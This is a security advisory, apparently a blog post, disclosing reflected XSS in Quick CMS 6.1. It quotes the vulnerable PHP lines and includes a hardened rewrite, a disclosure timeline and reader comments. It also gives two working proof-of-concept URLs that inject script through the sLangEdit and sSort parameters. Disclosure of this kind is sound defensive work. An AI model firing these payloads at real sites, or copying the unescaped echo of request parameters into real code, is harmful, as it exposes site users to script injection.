Quick CMS v 6.1 XSS Vulnerability

## FULL DISCLOSURE

#Product    : Quick CMS
#Exploit Author  : Rahul Pratap Singh
#Version    : 6.1
#Home page Link  : http://opensolution.org/home.html
#Website  : 0x62626262.wordpress.com
#Linkedin  : https://in.linkedin.com/in/rahulpratapsingh94
#Date        : 19/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-

The "sLangEdit" and "sSort" GET parameters are echoed into the page without sanitization, which leads to reflected XSS.

—————————————-
Vulnerable Code:
—————————————-

File Name: languages.php
Found at line:23

<h1><?php echo $lang['Languages'].( isset( $_GET['sLangEdit'] ) ? ' '.$_GET['sLangEdit'] : null ); ?></h1>

File Name: pages.php
Found at line:49

<form action="?p=pages<?php if( isset( $_GET['sSort'] ) ) echo '&amp;sSort='.$_GET['sSort']; ?>" name="form" method="post" class="main-form">
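A hardened rewrite of the two lines above, added here as an example and not code from the Quick.Cms project: it escapes the reflected value with htmlspecialchars() and allow-lists the sort key instead of echoing it. The set of valid sort keys and the request values are constructed for the demonstration.

```php
<?php
// Added example (not Quick.Cms code): hardened rendering of the two
// user-controlled parameters from languages.php and pages.php.

// Escape for an HTML text node or a double-quoted attribute.
// ENT_QUOTES also encodes ' and ", so a value can never close the
// action="..." attribute; ENT_SUBSTITUTE keeps invalid UTF-8 from
// truncating the output.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// sSort only ever selects a column, so allow-list it rather than
// echoing whatever arrives. Assumed set of valid keys (constructed).
const ALLOWED_SORT = ['id', 'name', 'date'];

function safeSort(?string $requested): ?string
{
    return in_array($requested, ALLOWED_SORT, true) ? $requested : null;
}

// Constructed request values, decoded from the PoC URLs in the advisory.
$_GET['sLangEdit'] = '</h1><script >alert("XSS")</script ><h1>';
$_GET['sSort']     = '"><img src=x onerror=confirm(1)><!--';
$lang = ['Languages' => 'Languages'];

// languages.php line 23, hardened: the value is escaped before echo,
// so the injected tags render as literal text inside the heading.
$title = $lang['Languages']
       . (isset($_GET['sLangEdit']) ? ' ' . esc($_GET['sLangEdit']) : '');
echo "<h1>{$title}</h1>\n";

// pages.php line 49, hardened: an unknown sort key is dropped entirely,
// and a valid one is still escaped before it enters the attribute.
$sort   = safeSort($_GET['sSort'] ?? null);
$action = '?p=pages' . ($sort !== null ? '&amp;sSort=' . esc($sort) : '');
echo "<form action=\"{$action}\" name=\"form\" method=\"post\" class=\"main-form\">\n";
```

With the PoC values above, the heading contains only encoded text (`&lt;script &gt;...`) and the form action falls back to `?p=pages` because the injected sort key is not in the allow-list.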

—————————————-
Exploit:
—————————————-
localhost/Quick.Cms_v6.1-en/admin.php?p=languages&sLangEdit=</h1><script >alert("XSS")</script ><h1>

localhost/Quick.Cms_v6.1-en/admin.php?p=pages&sSort="><img%20src=x%20onerror=confirm(1)><!--

—————————————-
POC:
—————————————-

[Screenshot: Quick.Cms v6.1 XSS PoC (sLangEdit)]

[Screenshot: Quick.Cms v6.1 XSS PoC 2 (sSort)]

Disclosure Timeline:
Tried to contact vendor via email: 14/1/2016 (email bounced back)
Tried to contact vendor via forum: 18/1/2016 (thread deleted, no response)

Public Disclosure: 19/1/2016


2 thoughts on "Quick CMS v 6.1 XSS Vulnerability"

  1. Does the exploit also work outside of admin.php? If not, it would mean that you need to have admin rights in order to “break in” and plant your code … but since you have admin rights already, it’s useless to break it. Please correct me if I’m wrong.


    • Indeed, in this advisory, authentication is required, else it’s useless. This advisory is just to show the poor coding and unvalidated parameters. These vulnerable parameters might have been used at numerous places in code which won’t require authentication.

